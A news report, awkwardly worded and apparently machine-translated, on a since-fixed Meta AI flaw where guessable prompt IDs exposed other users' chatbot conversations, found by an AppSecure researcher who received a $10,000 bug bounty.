Meta AI vulnerability fixes that could leak private user conversations: Report

AI News


Meta AI reportedly has a vulnerability that could be exploited to access private conversations of other users with chatbots. Accessing this bug didn't require you to infiltrate Meta's servers or manipulate your app's code. Instead, you can simply analyze the network traffic and trigger it. According to the report, the researchers spotted the bug late last year and notified the Menlo Park-based social media giant about it. The company then rolled out a fix to the issue in January, rewarding researchers with finding an exploit.

According to a report by TechCrunch, the meta-AI vulnerability was discovered by Sandeep Hodkasia, founder of security testing company AppSecure. The researcher reportedly notified Meta about it in December 2024 and received a bug reward of $10,000 (approximately Rs 85,000). Meta spokesman Ryan Daniels told the publication that the issue was fixed in January and the company couldn't find any evidence of how it was being used by bad actors.

The vulnerability reportedly occurred in the way that meta AI prompted users on the server. Researchers told the publication that AI chatbots assign a unique ID to every prompt and the response generated to that AI whenever a logged in user attempts to edit a prompt to play an image or text. In a typical use case, such incidents are very common as most people try to get a better response or desired image conversationally.

Hodkasia reportedly discovered that by analyzing the browser's network traffic while editing AI prompts, he could access his unique numbers. By subsequently changing the number, the researcher could access someone else's prompt and the designated AI response, the report argued. Researchers argued that these numbers were “easy to guess,” and did not try much to find another legitimate ID.

Essentially, the vulnerability existed in the way AI systems handle the approval of these unique IDs, and did not impose sufficient security measures to see who was accessing this data. In other words, at the hands of bad actors, this method could have led to a smashing of the user's large amount of private data.

In particular, last month's report found that the discovery feed of meta AI apps is filled with posts that look like private conversations with chatbots. These messages include seeking medical and legal advice, and even confessing a crime. Later in June, the company began to show warning messages that discourage people from sharing conversations without their knowledge.



Source link

Leave a Reply

Your email address will not be published. Required fields are marked *